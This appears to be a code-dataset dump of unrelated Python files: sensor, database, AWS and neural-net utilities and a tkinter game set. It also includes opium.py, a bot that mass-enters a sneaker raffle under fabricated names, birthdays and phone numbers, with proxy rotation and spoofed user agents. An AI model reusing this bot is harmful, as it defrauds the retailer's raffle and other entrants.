'+hex(recv[2]))\n\t\t\t#print(\"\\r\\n\")\n\t\t\tif (self.CheckCRC(recv) == recv[2]):\n\t\t\t\t#print('success...\\r\\n')\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t#print('Failed...')\n\t\t\t\treturn False\n\t\t\treturn recv\n\n\tdef getTemperature(self):\n\t\treturn self.toTemperature(self.runI2CCommand(self.CMD_READ_TEMPERATURE, 3))\n\n\tdef getHumidity(self):\n\t\treturn self.toHumidity(self.runI2CCommand(self.CMD_READ_HUMIDITY, 3))\n\t\n\tdef getUserRegister(self):\n\t\treturn self.decodeUserReg(self.runI2CCommand(self.CMD_READ_REGISTER, 1))\n\n\tdef setUserRegister(self, register):\n\t\tb = bytearray(2)\n\t\tb[0] = self.CMD_WRITE_REGISTER\n\t\tb[1] = register & 0b11000111\n\t\tself.i2c.writeto(self.ADDR, b)\n\n\tdef reset(self):\n\t\tself.runI2CCommand(self.CMD_RESET, 0)\n\n","sub_path":"sht2x.py","file_name":"sht2x.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"158034725","text":"\"\"\"\nget a list of harddrive strings for every Host from rethinkdb\nconfert it to a dict and update it in rethinkdb\n\"\"\"\nimport rethinkdb as r\n# from collections import OrderedDict\nfrom pon import config\nCONFIG = config.Config()\n\nr.connect(\n host=CONFIG.get('rethinkdb', 'hostname'),\n port=CONFIG.get('rethinkdb', 'port'),\n db=CONFIG.get('rethinkdb', 'dbname')\n).repl()\n\n\nif __name__ == '__main__':\n # get harddrives and fqdn\n for doc in r.table('hosts').filter(\n (r.row['facts']['is_virtual'] == 'false')).pluck(\n 'harddrives', {'facts': 'fqdn'}).run():\n drives = {}\n # continue if it's already done\n if isinstance((doc['harddrives']), dict):\n continue\n keys = doc['harddrives'][0].split(';')[1:]\n for drive in doc['harddrives'][1:]:\n values = drive.split(';')\n drive_id = values.pop(0)\n drives[drive_id] = {}\n for index, value in enumerate(values):\n drives[drive_id][keys[index]] = value\n\n r.table('hosts').filter(\n r.row['facts']['fqdn'] == doc['facts']['fqdn']).update(\n {'harddrives': drives}).run()\n","sub_path":"harddrives2json.py","file_name":"harddrives2json.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"497869532","text":"import os\nimport json\nimport glob\nfrom os import path, mkdir\nfrom shutil import rmtree\n\n\nclass Cache:\n def __init__(self, verbose=False):\n self.cache_dir = \"/tmp/awsmap-cache\"\n self.verbose = verbose\n if not path.exists(self.cache_dir):\n mkdir(self.cache_dir)\n\n def p(self, msg):\n if self.verbose:\n print(msg)\n\n def clear(self):\n rmtree(self.cache_dir)\n # for f in glob.glob(\"{}/**\".format(self.cache_dir)):\n # os.remove(f)\n\n def get_cache(self, cache_key):\n cache_file = \"{}/{}\".format(self.cache_dir, cache_key)\n if '/' in cache_key:\n account_dir = \"{}/{}\".format(self.cache_dir, cache_key.split(\"/\")[0])\n if not path.exists(account_dir):\n mkdir(account_dir)\n\n if not path.exists(cache_file):\n print(cache_file)\n return False\n else:\n return json.loads(open(cache_file).read())\n\n def set_cache(self, cache_key, data):\n cache_file = \"{}/{}\".format(self.cache_dir, cache_key)\n self.p(\"Setting cache: {}\".format(cache_file))\n f = open(cache_file, 'w')\n j_data = json.dumps(data, indent=4, sort_keys=True, default=str)\n f.write(j_data)\n return json.loads(j_data)\n","sub_path":"lib/awsmap/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"260028108","text":"import random\nimport string\nimport sys\nimport time\nfrom random import choice\nfrom threading import Thread\n\nimport names\nimport requests\nfrom colorama import Fore, init\n\nfrom config.useragents import ua\nfrom helpers.custom_logging import log\nfrom helpers.functions import (choose_random_n, gen_birthday, gen_phone,\n get_config, get_proxy2, get_time, read_from_txt, stop_program)\n\nfrom config.app_config import home, PATH_CONFIG, PATH_IMAGES, PATH_INSTA, PATH_LOG, PATH_VERIF, PATH_ACC\nfrom pathlib import Path\n\ndef account(l, proxy_list, s, fname, lname, email, password, birthday):\n try:\n headers = {\n 'authority': 'www.opiumparis.com',\n 'cache-control': 'max-age=0',\n 'origin': 'https://www.opiumparis.com',\n 'upgrade-insecure-requests': '1',\n 'content-type': 'application/x-www-form-urlencoded',\n 'user-agent': choice(ua),\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-user': '?1',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'sec-fetch-site': 'same-origin',\n 'referer': l,\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'\n }\n data = {\n 'id_customer': '',\n 'id_gender': '1',\n 'firstname': fname,\n 'lastname': lname,\n 'email': email,\n 'password': password,\n 'birthday': birthday,\n 'submitCreate': '1'\n }\n s.proxies = get_proxy2(proxy_list)\n content = s.post(l, headers=headers, data=data, timeout=10)\n if content.status_code != 200:\n log('e', Fore.RED + get_time() + 'Connection Error, rotating proxy...')\n return\n return content\n except (requests.exceptions.ProxyError, requests.exceptions.SSLError):\n pass\n except Exception as e:\n log('e', Fore.RED + get_time() + 'An exception occured: ' + str(e))\n time.sleep(2)\n sys.exit()\n\n\ndef entry(s, proxy_list, email):\n try:\n config = get_config()\n fname = names.get_first_name()\n lname = names.get_last_name()\n password = ''.join(random.choices(string.ascii_letters + string.digits, k=10))\n method = config['profile']['Email_type']\n \n birthday = gen_birthday()\n link = config['link_opium']\n\n sizelist = ['7 US - 40 EU', '7.5 US - 40.5 EU', '8 US - 41 EU', '8.5 US - 42 EU', '9 US - 42.5 EU', '9.5 US - 43 EU', '10 US - 44 EU', '10.5 US - 44.5 EU', '11 US - 45 EU', '11.5 US - 45.5 EU', '12 US - 46 EU', '12.5 US - 47 EU', '13 US - 47.5 EU']\n sizenum = random.randint(config['opium_size_1'], config['opium_size_2'])\n size = sizelist[sizenum]\n _l = link\n # log('i', Fore.GREEN + get_time() + \"Account Created !\")\n headers = {\n 'sec-fetch-mode': 'cors',\n 'origin': 'https://www.opiumparis.com',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n 'x-requested-with': 'XMLHttpRequest',\n 'user-agent': choice(ua),\n 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'accept': 'application/json, text/javascript, */*; q=0.01',\n 'referer': link,\n 'authority': 'www.opiumparis.com',\n 'sec-fetch-site': 'same-origin'\n }\n m2 = birthday.strip().split('/')\n neww = m2[2] + '-' + m2[1] + '-' + m2[0]\n data = {\n 'lastname': lname,\n 'firstname': fname,\n 'birthday': neww,\n 'size': size,\n 'email': email,\n 'phone': gen_phone(),\n 'cgv': '1',\n 'action': 'Raffle'\n }\n response = s.post(_l, headers=headers, data=data, timeout=10)\n if response.status_code not in (200, 201):\n log('e', Fore.RED + get_time() + \"Entry could not be submitted with status code [%s], trying again ...\" % response.status_code)\n entry(s, proxy_list, email)\n else:\n log('s', Fore.GREEN + get_time() + \"Entry submitted ! [%s]\" % email)\n with open(Path(PATH_LOG + \"opium.txt\"), 'a') as _account:\n _account.write(email + '\\n')\n\n \"\"\"\n if method == 'email':\n remove_email(path, email)\n \"\"\"\n\n except Exception as e:\n log('i', Fore.RED + get_time() + str(e))\n\n\ndef main():\n try:\n tc = int(input('How many entries ? -> '))\n except ValueError:\n log('i', Fore.RED + get_time() + \"Please input a number\")\n stop_program()\n requests.packages.urllib3.disable_warnings()\n\n config = get_config()\n delay = config['profile']['Delay']\n try:\n proxies = read_from_txt(Path(PATH_CONFIG + \"proxies.txt\"))\n except Exception:\n log('i', Fore.RED + get_time() + \"Proxy file is empty, please input some proxies.\")\n stop_program()\n try:\n emails = read_from_txt(Path(PATH_ACC + \"opium.txt\"))\n except Exception:\n log('i', Fore.RED + get_time() + \"Email file is empty, please input some emails.\")\n stop_program()\n log('i', Fore.CYAN + get_time() + str(len(proxies)) + \" proxies loaded.\")\n\n threads = []\n\n randomly_selected_emails = choose_random_n(emails, tc)\n\n for i in range(tc):\n s = requests.session()\n email = randomly_selected_emails[i].strip().split(':')[0]\n t = Thread(target=entry, args=(s, proxies, email,))\n \n threads.append(t)\n t.start()\n time.sleep(int(delay))\n\n for t in threads:\n t.join()\n time.sleep(2)\n\n\nif __name__ == '__main__':\n init(autoreset=True)\n main()\n","sub_path":"Desktop/Breaker-Raffle/scripts/opium.py","file_name":"opium.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"476663348","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 22 14:00:19 2019\n\n@author: rober\n\"\"\"\n\nimport numpy as np\nimport torch\nimport random\n\n\ndef batch_generator(X, Y, n_batches): \n \n random.seed(0)\n \n batch_size = X.shape[0] // n_batches\n \n idx = list(X.index)\n random.shuffle(idx) \n idx = idx[:n_batches*batch_size]\n \n for i in range(n_batches): \n bi = np.random.choice(idx, batch_size, replace=False)\n X_batch = X.loc[bi]\n Y_batch = Y.loc[bi]\n idx = [i for i in idx if i not in bi]\n yield (X_batch,Y_batch)\n \n \ndef comb_error(output, target, sig2):\n output = (output + 0.0001)*0.999 #help avoid numerical errors\n p = target[:,0]\n \n logErr1 = torch.mul(torch.log(output[:,0]), p)\n logErr2 = torch.mul(torch.log(1 - output[:,0]) , (1 - p))\n mseErr = torch.mul(torch.pow(target[:,1] - output[:,1], 2), (1 - p))\n \n logErr1 = -1 * torch.sum(logErr1)\n logErr2 = -1 * torch.sum(logErr2)\n mseErr = torch.sum(mseErr) \n \n return (1/output.shape[0]) * (logErr1 + logErr2 + (1/sig2)*mseErr) \n \n\ndef mae_error(output, target): \n y = target\n yhat = np.squeeze(output)\n MAE = np.mean(np.absolute(y - yhat)) \n return MAE \n\n\ndef fmapper(x):\n y = x.copy()\n y[x<9] = 1\n y[(x>=9) & (x<53)] = 2\n y[(x>=53) & (x<172)] = 3\n y[x>=172] = 4 \n return y\n\n\n\ndef hrat_error(output, target):\n y = target\n yhat = np.squeeze(output) \n yhat = fmapper(yhat)\n y = fmapper(y) \n hr = np.sum((yhat==y)*1)/len(y) \n return (1-hr) \n\n\n\ndef fit(X, X_val, Y, Y_val, net, optimizer, error, val_error, n_epochs, \n n_batches, batch_to_avg, ep_to_check, clipping, PATH, device, verbose, min_val_loss = float('inf')):\n \n torch.manual_seed(0)\n net = net.to(device)\n \n losses = []\n val_losses = []\n\n val_inputs = torch.FloatTensor(X_val.values)\n val_labels = torch.FloatTensor(Y_val)\n val_inputs, val_labels = val_inputs.to(device), val_labels.to(device) \n \n \n for epoch in range(n_epochs): # loop over the dataset multiple times\n \n running_loss = 0\n \n # zero the parameter gradients\n optimizer.zero_grad()\n \n counter = 0\n \n for batch_x, batch_y in batch_generator(X, Y, n_batches): \n \n counter += 1 \n \n net.train()\n # get the inputs\n inputs = torch.FloatTensor(batch_x.values)\n labels = torch.FloatTensor(batch_y.values)\n inputs, labels = inputs.to(device), labels.to(device) \n \n \n # forward + backward + optimize\n outputs = net.forward(inputs)\n loss = error(outputs, labels)\n \n loss.backward() \n \n running_loss += loss.item() \n \n if counter % batch_to_avg == 0:\n \n torch.nn.utils.clip_grad_norm_(net.parameters(), clipping) \n \n optimizer.step()\n optimizer.zero_grad() \n \n \n running_loss = running_loss/n_batches \n \n with torch.no_grad():\n net.eval()\n val_outputs = net.forward(val_inputs)\n \n val_outputs2, val_labels2 = val_outputs.cpu(), val_labels.cpu()\n val_outputs2, val_labels2 = val_outputs2.numpy(), val_labels2.numpy()\n \n val_loss = val_error(val_outputs2, val_labels2)\n \n losses.append(running_loss)\n val_losses.append(val_loss) \n \n \n if verbose == 1:\n print('Epoch {0}: Training Loss: {1}, Validation Loss: {2}'\\\n .format(epoch+1, running_loss, val_loss))\n \n \n \n if (epoch % ep_to_check == 0) and (epoch >= ep_to_check):\n \n mean_val_loss = np.mean(val_losses[-ep_to_check:])\n \n \n if mean_val_loss < min_val_loss:\n torch.save(net.state_dict(), PATH)\n if verbose == 1:\n print('New Checkpoint Saved into PATH')\n min_val_loss = mean_val_loss\n \n return (losses, val_losses, min_val_loss)\n ","sub_path":"2 PART MIXTURE/fit10_nn.py","file_name":"fit10_nn.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"620483706","text":"from chalice import Chalice, Response\nimport boto3\n\nsqs = boto3.client('sqs')\n\n\nQUEUE_NAME = 'chalice-demo-queue'\n\n\ndef create_queue():\n try:\n queue = sqs.create_queue(QueueName=QUEUE_NAME, Attributes={\"DelaySeconds\": \"5\"})\n print(queue)\n return {'success': True, 'message': f'queue with name {QUEUE_NAME} created', 'status': 200}\n\n except Exception as e:\n print(e)\n return {'status_code': 400}\n\n\ndef send_message(message_body):\n try:\n queue_res = sqs.get_queue_url(QueueName=QUEUE_NAME)\n print(queue_res)\n queue_url = queue_res['QueueUrl']\n response = sqs.send_message(QueueUrl=queue_url, DelaySeconds=10, MessageBody=message_body)\n return {'status': 200, 'message': 'Message sent {}'.format(response['MessageId'])}\n except Exception as e:\n print(e)\n return {'status': 400, 'message': \"unable to send sqs message\"}\n\n\ndef get_messages():\n try:\n queue_response = sqs.get_queue_url(QueueName=QUEUE_NAME)\n queue_url = queue_response['QueueUrl']\n response = sqs.receive_message(\n QueueUrl=queue_url,\n AttributeNames=[\n 'SentTimestamp'\n ],\n MaxNumberOfMessages=10,\n MessageAttributeNames=[\n 'All'\n ],\n VisibilityTimeout=20,\n WaitTimeSeconds=20\n )\n\n messages = response['Messages']\n\n return messages\n\n except Exception as e:\n print(str(e))\n # app.log.error('error occurred during creating queue')\n return {\"Error\": 'error occurred during sending message queue' + str(e), \"status_code\": 400}\n","sub_path":"my-app/chalicelib/sqs_service.py","file_name":"sqs_service.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"344410466","text":"import tkinter\r\nfrom tkinter import *\r\nimport time \r\nimport random\r\n\r\n\r\n#Counter class for counter object\r\nclass Counter(object):\r\n def __init__(self):\r\n self._counter = 0\r\n \r\n def getCounter(self):\r\n return self._counter\r\n\r\n def increment(self):\r\n self._counter = self._counter + 1\r\n score[\"text\"] = self._counter\r\n \r\n def decrement(self): #used for rocket percentage\r\n self._counter = self._counter - 1\r\n \r\n def reset(self):\r\n self._counter = 0\r\n \r\n counter = property(getCounter)\r\n\r\n \r\n#rocket class, object will have different values for each component\r\nclass RocketSpecs:\r\n def __init__(self,weight,power):\r\n self.weight = weight\r\n self.power = power\r\n \r\n def getWeight(self):\r\n return self.weight\r\n \r\n def getPower(self):\r\n return self.power\r\n \r\n def weightinc(self):\r\n self.weight += 1\r\n \r\n def powerinc(self):\r\n self.power += 1\r\n \r\n def resetWeight(self):\r\n self.weight = 0\r\n \r\nrocket = RocketSpecs(0,0)\r\n\r\n\r\n#gets the time and draws thwe rectangle in random position when start button pressed or when rectangle clicked\r\ndef cb2():\r\n canvas.delete(ALL)\r\n global timer1\r\n timer1 = time.time()\r\n randomx = random.randint(0,300)\r\n randomy = random.randint(0,250)\r\n rectangle = canvas.create_rectangle(randomx, randomy, randomx+30 , randomy+30, fill=\"blue\", outline=\"red\")\r\n canvas.tag_bind(rectangle, \"<ButtonPress-1>\", addCounter)\r\n\r\n\r\n#increments counter when rectangle clicked on \r\ndef addCounter(event):\r\n global timer2\r\n timer2 = time.time()\r\n if (timer2 - timer1) < 2:\r\n counter.increment()\r\n canvas.delete(ALL)\r\n cb2()\r\n \r\n\r\n \r\n\r\ncounter = Counter()\r\n\r\n\r\n#function which draws the initial unfinished snowman picture, awaits keyboard input\r\ndef house():\r\n clearForGame()\r\n frame5.grid_remove()\r\n canvas.delete(ALL)\r\n frame2.grid_remove()\r\n frame6.grid_remove()\r\n score.grid_remove()\r\n nameLabel.grid()\r\n nameButton.grid()\r\n dinput.grid()\r\n points1 = [15,200,60,25,60,25,115,200,115,200,15,200]\r\n tree = canvas.create_polygon(points1,outline=\"green\",fill=\"green\",width=6)\r\n snowmanBottom = canvas.create_oval(250,150,350,250,fill=\"white\")\r\n snowmanTop = canvas.create_oval(275,100,325,165,fill=\"white\")\r\n ground = canvas.create_rectangle(0,250,400,300, fill=\"white\")\r\n canvas.create_rectangle(55,203,75,250,fill=\"brown\")\r\n canvas.configure(bg=\"black\")\r\n instructionLabel[\"text\"] = \"Merry Christmas!\\n\\n INSTRUCTIONS \\n Finish the picture:\\n Star: 't'\\n Lights: 'r'\\n Present: 'e'\\n Eyes: 's' \\nCarrot: 'h'\\n Arm: 'd'\\n Buttons: 'g'\\n Add Hat: 'y'\\n RESTART: 'f'\"\r\n \r\n master.bind(\"<Key>\", keyAdd)\r\n counter.reset()\r\n score[\"text\"] = 0\r\n\r\n#each function in this class corresponds to a keyboard input which determines what is drawn\r\nclass presents:\r\n def __init__(self, x, y, x2, y2):\r\n self.x = x\r\n self.y = y\r\n self.x2 = x2\r\n self.y2 = y2\r\n\r\n def drawPresent():\r\n p1 = presents(81, 215, 120, 251)\r\n present = canvas.create_rectangle(p1.x,p1.y,p1.x2,p1.y2,fill=\"red\")\r\n wrappingy = canvas.create_line(p1.x+21,p1.y+1,p1.x2-19,p1.y2-1,fill=\"yellow\", width=5)\r\n wrappingx = canvas.create_line(p1.x+1,p1.y+18,p1.x2-1,p1.y2-18,fill=\"yellow\",width=5)\r\n\r\n \r\n\r\n def drawHat():\r\n hb = presents(270,95,330,110) \r\n htop = presents(280,60,320,96)\r\n bottom = canvas.create_rectangle(hb.x,hb.y,hb.x2,hb.y2,fill=\"gray40\", outline=\"red\")\r\n top = canvas.create_rectangle(htop.x,htop.y,htop.x2,htop.y2,fill=\"gray40\", outline=\"red\")\r\n\r\n def drawCarrot():\r\n carrot = canvas.create_polygon(294,135,302,135,302,135,298,160,298,160,294,135, outline=\"orange\", fill=\"orange\")\r\n\r\n def drawButtons():\r\n buttons_list = [175, 200, 225]\r\n for button in buttons_list:\r\n canvas.create_oval(292,button,304,button+10,fill=\"black\")\r\n\r\n def drawStar():\r\n star_points = [60,17,40,25,60,17,80,25,80,25,65,10,65,10,80,5,80,5,65,0,40,25,55,10,55,10,40,5,40,5,55,0]\r\n canvas.create_polygon(star_points, fill=\"yellow\",outline=\"yellow\", width=5)\r\n\r\n def drawLights():\r\n row = [50,62,75]\r\n row1 = [38,50,62,74,85]\r\n row2 = [27,39,51,63,75,87,99]\r\n for light in row:\r\n canvas.create_oval(light,light+5,light+10,light,fill=\"white\")\r\n for light1 in row1:\r\n canvas.create_oval(light1,light1+50,light1+10,light1+45,fill=\"red\")\r\n for light2 in row2:\r\n canvas.create_oval(light2,light2+100,light2+10,light2+95,fill=\"gold\")\r\n for light3 in row:\r\n canvas.create_oval(light3-23,light3+125,light3-13,light3+120,fill=\"white\")\r\n\r\n def drawBranch():\r\n branch_points = [265,165,255,170,255,170,225,145,225,145,215,160,215,160,213,143,213,143,200,155,200,155,210,140,210,140,265,165 ]\r\n canvas.create_polygon(branch_points, fill=\"brown\",outline=\"brown\", width=2)\r\n\r\n def drawEyes():\r\n eye_list = [280,304]\r\n for eye in eye_list:\r\n canvas.create_oval(eye,125,eye+12,135,fill=\"black\")\r\n\r\n#waits for keyboard input to draw the snowman picture \r\ndef keyAdd(event):\r\n if event.char == \"e\" or event.char == \"E\":\r\n presents.drawPresent()\r\n \r\n if event.char== \"y\" or event.char == \"Y\":\r\n presents.drawHat()\r\n \r\n if event.char == \"h\" or event.char == \"H\":\r\n presents.drawCarrot()\r\n \r\n if event.char == \"g\" or event.char == \"G\":\r\n presents.drawButtons()\r\n \r\n if event.char == \"t\" or event.char == \"T\":\r\n presents.drawStar()\r\n \r\n if event.char == \"r\" or event.char == \"R\":\r\n presents.drawLights()\r\n \r\n if event.char == \"d\" or event.char == \"D\":\r\n presents.drawBranch()\r\n\r\n if event.char == \"s\" or event.char == \"S\":\r\n presents.drawEyes()\r\n \r\n if event.char == \"f\" or event.char == \"F\":\r\n house()\r\n \r\n\r\n\r\n#square objects created with coordinates and fill color, can move in any direction, enlarge and change colour \r\nclass Squares:\r\n def __init__(self, x, y, x2, y2, colour):\r\n self.x = x\r\n self.y = y\r\n self.x2 = x2\r\n self.y2 = y2\r\n self.colour = colour\r\n \r\n def moveright(self):\r\n if self.x <= 400:\r\n self.x += 5\r\n self.y = self.y\r\n self.x2 += 5\r\n self.y2 = self.y2\r\n else:\r\n self.x = 0\r\n self.y = self.y\r\n self.x2 = 30\r\n self.y2 = self.y2\r\n self.draw()\r\n \r\n def moveleft(self):\r\n if self.x2 >= 0:\r\n self.x -= 5\r\n self.y = self.y\r\n self.x2 -= 5\r\n self.y2 = self.y2\r\n else:\r\n self.x = 400\r\n self.y = self.y\r\n self.x2 = 430\r\n self.y2 = self.y2\r\n self.draw()\r\n \r\n def moveup(self):\r\n if self.y2 >= 0:\r\n self.x = self.x\r\n self.y -= 5\r\n self.x2 = self.x2\r\n self.y2 -= 5\r\n else:\r\n self.x = self.x\r\n self.y = 300\r\n self.x2 = self.x2\r\n self.y2 = 330\r\n self.draw()\r\n \r\n def movedown(self):\r\n if self.y <= 300:\r\n self.x = self.x\r\n self.y += 5\r\n self.x2 = self.x2\r\n self.y2 += 5\r\n else:\r\n self.x = self.x\r\n self.y = 0\r\n self.x2 = self.x2\r\n self.y2 = 30\r\n self.draw()\r\n \r\n \r\n def bigger(self):\r\n self.x = self.x\r\n self.y = self.y\r\n self.x2 = self.x2+20\r\n self.y2 = self.y2+20\r\n \r\n \r\n def draw(self):\r\n canvas.create_rectangle(sq1.x, sq1.y, sq1.x2, sq1.y2, fill=sq1.colour)\r\n \r\n def blue(self):\r\n self.colour = \"Blue\"\r\n \r\n def green(self):\r\n self.colour = \"Green\"\r\n \r\n def orange(self):\r\n self.colour = \"Orange\"\r\n \r\n\r\n\r\n \r\n \r\n\r\nsq1 = Squares(100, 120, 130, 150, \"orange\")\r\n \r\n#this listens to what key is pressed which will determine the direction the object will move\r\ndef direction(event):\r\n if event.char == \"d\" or event.char == \"D\":\r\n sq1.moveright()\r\n if event.char == \"a\" or event.char == \"A\":\r\n sq1.moveleft()\r\n if event.char == \"w\" or event.char == \"W\":\r\n sq1.moveup()\r\n if event.char == \"s\" or event.char == \"S\":\r\n sq1.movedown()\r\n\r\n \r\n \r\n \r\n#this function initialises the canvas for the flags game, removes all other redundant widgets\r\ndef moving():\r\n clearForGame()\r\n canvas.delete(ALL)\r\n instructionLabel[\"text\"] = \"\"\"Flags Game\\n\\nUsing 'awsd' keys:\\nHold 'a'--> Left\\nHold 'd'--> Right\\nHold 'w'--> Up\\nHold 's'--> Down\\n\\n\r\n *CHALLENGE*\\n 1.Draw the flag\\n of Finland\\n 2.Draw the flag\\n of Ireland\\n (Hint: Use Enlarge to\\n cover more area)\"\"\"\r\n canvas.configure(bg=\"white\")\r\n counter.reset()\r\n score[\"text\"] = 0\r\n frame2.grid_remove()\r\n frame6.grid_remove()\r\n score.grid_remove()\r\n nameLabel.grid()\r\n nameButton.grid()\r\n dinput.grid()\r\n canvas.create_rectangle(sq1.x, sq1.y, sq1.x2, sq1.y2, fill=\"orange\")\r\n \r\n ###FRAME AT BOTTOM FOR THE MOVEMENT GAME###\r\n frame5.grid()\r\n ###CONTROL PANEL, DIFFERENT COLOURS AND ENLARGE###\r\n blueButton = Button(frame5, text=\"BLUE\", command=sq1.blue)\r\n blueButton.configure(width=12, bg=\"blue\", fg=\"white\")\r\n blueButton.grid(column=0, row=0)\r\n orangeButton = Button(frame5, text=\"ORANGE\", command=sq1.orange)\r\n orangeButton.configure(width=12, bg=\"orange\", fg=\"white\")\r\n orangeButton.grid(column=1, row=0)\r\n greenButton = Button(frame5, text=\"GREEN\", command=sq1.green)\r\n greenButton.configure(width=12, bg=\"green\", fg=\"white\")\r\n greenButton.grid(column=2, row=0)\r\n biggerButton = Button(frame5, text=\"ENLARGE\", command=sq1.bigger)\r\n biggerButton.configure(width=9, bg=\"gray48\", fg=\"white\")\r\n biggerButton.grid(column=3, row=0)\r\n clearButton = Button(frame5, text=\"CLEAR\", command=moving)\r\n clearButton.configure(width=9, bg=\"gray48\", fg=\"white\")\r\n clearButton.grid(column=4, row=0)\r\n ###LISTEN FOR AWSD KEY###\r\n master.bind(\"<Key>\", direction)\r\n\r\n#clear for Rocket Assembly game\r\ndef clearWhole():\r\n frame1.grid_remove()\r\n frame2.grid_remove()\r\n frame5.grid_remove()\r\n frame6.grid_remove()\r\n score.grid_remove()\r\n score.grid_remove()\r\n nameLabel.grid_remove()\r\n nameButton.grid_remove()\r\n dinput.grid_remove()\r\n counter.reset()\r\n frame6.grid()\r\n createForm()\r\n \r\n \r\ndef clearForGame(): #clear for the 2 second shape game\r\n frame1.grid()\r\n frame2.grid()\r\n frame5.grid_remove()\r\n frame6.grid_remove()\r\n score.grid()\r\n nameLabel.grid()\r\n nameButton.grid()\r\n dinput.grid()\r\n canvas.delete(ALL)\r\n instructionLabel[\"text\"] = \"Press Start Button \\nClick within 2 secs\\n\\nGOOD LUCK!\"\r\n canvas.configure(bg=\"white\")\r\n counter.reset()\r\n score[\"text\"] = 0\r\n\r\n\r\n#process the input in the name entry, if there is any\r\ndef getName():\r\n name = dinput.get()\r\n if name:\r\n nameLabel[\"text\"] = \"Name: \"+ name\r\n master.configure(bg=\"green\")\r\n start.configure(bg=\"chartreuse2\")\r\n nameButton.configure(bg=\"chartreuse2\")\r\n dinput.configure(fg=\"green\")\r\n instructionLabel.configure(bg=\"chartreuse2\", width=16, height=20)\r\n\r\n frame1.configure(bg=\"green\")\r\n frame2.configure(bg=\"green\")\r\n\r\n name2 = Label(frame1, text=name, pady=10)\r\n name2.configure(width=32, fg=\"green\",bg=\"chartreuse2\", padx=0, font =(\"Helvetica\", 16))\r\n name2.grid(column=2, row=0)\r\n\r\n else:\r\n nameLabel['text'] = \"NO NAME ENTERED\"\r\n canvas.delete(ALL)\r\n master.configure(bg=\"black\")\r\n start.configure(bg=\"gray32\")\r\n nameButton.configure(bg=\"gray32\")\r\n\r\n frame1.configure(bg=\"black\")\r\n frame2.configure(bg=\"black\")\r\n\r\n\r\n \r\n#initialises the rocket assembly frame\r\ndef createForm():\r\n titleToppings = Label(frame6, text=\"Rocket Assemble\", bg=\"black\",fg=\"white\", padx=20)\r\n titleToppings.grid(row=0,column=0)\r\n addTopping = Label(frame6, text=\"\"\"Target: Land on the Moon\\nINSTRUCTIONS: \\n1.Assume fuel, engines already included.\\n2.Select your components below for your rocket. \\n3.Boosters and command module are essential!\\n4. Challenge: Get 100% chance\\n\\nHINT: Adding more components results in a heavier rocket,\\n and a heavy rocket will decrease success rate...\"\"\")\r\n addTopping.grid(row=1,column=0)\r\n \r\n#find out which checkboxes have been pressed then do something\r\ndef getToppings(): \r\n rocket.resetWeight()\r\n if landingvar.get() == 1:\r\n rocket.weightinc()\r\n counter.increment()\r\n landingLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n landingLabel.grid(column=2,row=6)\r\n if landingvar.get() != 1:\r\n landingLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n landingLabel.grid(column=2,row=6)\r\n \r\n if commandvar.get() == 1:\r\n counter.increment()\r\n commandLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n commandLabel.grid(column=2,row=5)\r\n if commandvar.get() != 1:\r\n commandLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n commandLabel.grid(column=2,row=5)\r\n \r\n \r\n if extravar.get() == 1:\r\n rocket.weightinc()\r\n counter.increment()\r\n extraLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n extraLabel.grid(column=2,row=4)\r\n if extravar.get() != 1:\r\n extraLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n extraLabel.grid(column=2,row=4)\r\n \r\n if fuelvar.get() == 1:\r\n counter.increment()\r\n rocket.weightinc()\r\n fuelLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n fuelLabel.grid(column=2,row=3)\r\n if fuelvar.get() != 1:\r\n fuelLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n fuelLabel.grid(column=2,row=3)\r\n \r\n if boostersvar.get() == 1:\r\n rocket.weightinc()\r\n counter.increment()\r\n boostersLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n boostersLabel.grid(column=2,row=2)\r\n if boostersvar.get() != 1:\r\n boostersLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n boostersLabel.grid(column=2,row=2)\r\n \r\n \r\n if rovervar.get() == 1:\r\n rocket.weightinc()\r\n counter.increment()\r\n roverLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n roverLabel.grid(column=2,row=7)\r\n if rovervar.get() != 1:\r\n roverLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n roverLabel.grid(column=2,row=7)\r\n calculate()\r\n \r\ndef weights():\r\n calculate()\r\n \r\n#calculate the percentage based off the counter and rocket object values\r\ndef calculate():\r\n overallPercentage = 100\r\n chance = overallPercentage-(rocket.getWeight()*10)\r\n percentageLabel [\"text\"] = \"Percentage Chance: {}%\".format(chance)\r\n if counter.getCounter() < 2:\r\n percentageLabel [\"text\"] = \"Percentage Chance: {}%\\n\\n Only {} components selected,\\n rocket is incomplete.\".format(chance, counter.getCounter())\r\n if rocket.getWeight() > 3:\r\n percentageLabel [\"text\"] = \"Percentage 